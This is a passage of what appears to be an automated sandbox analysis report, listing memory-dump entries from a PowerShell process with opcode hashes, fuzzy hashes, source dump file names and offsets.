                                                                                                      • Opcode Fuzzy Hash: 19890b8c1620163a6dd2fe5eb617a955ff408789b99611ca0b1e17b0f645d08b
                                                                                                      • Instruction Fuzzy Hash: BD41CF7180DBC44FEB579B299C55A523FF0EF52260F1605DFD088CB1A3D729A84AC7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4c7b33ee54c6870ebc2750273c4f8c0f4dc59a1edbf3c454297d435eda424fdd
                                                                                                      • Instruction ID: 2952cf37f8c7f1b014c8635456b79bcb172b06c179b9533cedc715c37b6dc1c1
                                                                                                      • Opcode Fuzzy Hash: 4c7b33ee54c6870ebc2750273c4f8c0f4dc59a1edbf3c454297d435eda424fdd
                                                                                                      • Instruction Fuzzy Hash: 73212B7190C74C4FDB59DBAC8C4A7E97FE0EB96321F04426FD048C7152DA706409C751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1631eb7ebcc6265656b837ca62d122ccf85fc67bdd01f94fd00d6ae6b901949d
                                                                                                      • Instruction ID: 7019e4a93e8642003281720e90192550e77fd28861b0ecfedb4cb58977664543
                                                                                                      • Opcode Fuzzy Hash: 1631eb7ebcc6265656b837ca62d122ccf85fc67bdd01f94fd00d6ae6b901949d
                                                                                                      • Instruction Fuzzy Hash: 9031D27085864E8EEBB4AF14CC5ABF932D0FB4639AF80413AD40D87092DF38798DCA15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3592004a6434fcc380b2d27c0b2e506826e2742b92750823369756b8ebe8e06b
                                                                                                      • Instruction ID: 7a54dccbaaff0de49f09560d7ac0454ac2130dd19fbdc82663a8107dadb80726
                                                                                                      • Opcode Fuzzy Hash: 3592004a6434fcc380b2d27c0b2e506826e2742b92750823369756b8ebe8e06b
                                                                                                      • Instruction Fuzzy Hash: E701A73110CB0C4FDB44EF0CE451AA5B3E0FB85360F10056EE58AC3251DB36E882CB45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15494855875.00007FF829050000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF829050000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff829050000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 181925f784000534783c6978159504a080ac1f9f867e53a611128dedd2016f75
                                                                                                      • Instruction ID: 1603cfd7dd46d3b8715a85478c53eb079e13e936c2aa63e99672d9f3159f553d
                                                                                                      • Opcode Fuzzy Hash: 181925f784000534783c6978159504a080ac1f9f867e53a611128dedd2016f75
                                                                                                      • Instruction Fuzzy Hash: A0F05E32A1C5588FEBA9EB5CE8469A873E0FF49360B1400B6E14DC7567DB25EC05C754
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85f8a4f3cbea4dab54166d2b9d0e4987265acd10f9ca122bf98872b73d3ab326
                                                                                                      • Instruction ID: 675c5aadef9ce3bc0508006fd2f9f8acbf39670a887eed93af83586b8899f4d1
                                                                                                      • Opcode Fuzzy Hash: 85f8a4f3cbea4dab54166d2b9d0e4987265acd10f9ca122bf98872b73d3ab326
                                                                                                      • Instruction Fuzzy Hash: C9F02B318086CD8FDB069F24CC195D47FA0EF26250F040297D448C70A1DF64A958CBC2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15494275793.00007FF829010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF829010000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff829010000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $_H
                                                                                                      • API String ID: 0-1363109747
                                                                                                      • Opcode ID: 54cfc8e7966bbddc413076d7762d3fc60fc365e247ca00c779fba97de5784262
                                                                                                      • Instruction ID: 6eee805b588fbd368e22dd9c8e602a30d880c20f3bd01ebd0b308f728c91baec
                                                                                                      • Opcode Fuzzy Hash: 54cfc8e7966bbddc413076d7762d3fc60fc365e247ca00c779fba97de5784262
                                                                                                      • Instruction Fuzzy Hash: EC02A371D0D6C98FEBA6DB288C656A47BE1FF56750F0900FAC04DCB1A3EA28AC45C751